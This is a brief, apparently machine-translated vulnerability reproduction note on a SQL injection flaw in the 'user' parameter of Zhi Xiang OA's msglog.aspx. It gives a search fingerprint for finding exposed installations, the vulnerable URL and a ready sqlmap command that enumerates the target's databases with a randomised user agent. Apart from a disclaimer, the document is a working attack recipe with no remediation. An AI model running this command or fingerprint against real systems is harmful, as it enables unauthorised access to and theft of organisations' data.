Preface ： Zhi Xiang OA Product vulnerability recurrence notes , For your own use , Irregular update
Statement ： All my articles are technical sharing , Do not use it illegally for other purposes , Otherwise, we will be responsible for the consequences .

Vulnerability list ：
Zhi Xiang OA msglog.aspx SQL Inject holes

Zhi Xiang OA msglog.aspx SQL Inject holes

Vulnerability description
Zhi Xiang OA msglog.aspx File exists SQL Inject holes , An attacker can obtain sensitive information through a vulnerability

Holes affect
Zhi Xiang OA

Network mapping

app=" Zhixiang Software - Zhi Xiang OA"

Loophole recurrence
The parameters of existence injection are user
poyload：

/mainpage/msglog.aspx?user=1

py -3 sqlmap.py -u "http://xx.xx.xx/mainpage/msglog.aspx?user=1" -p user --dbs --random-agent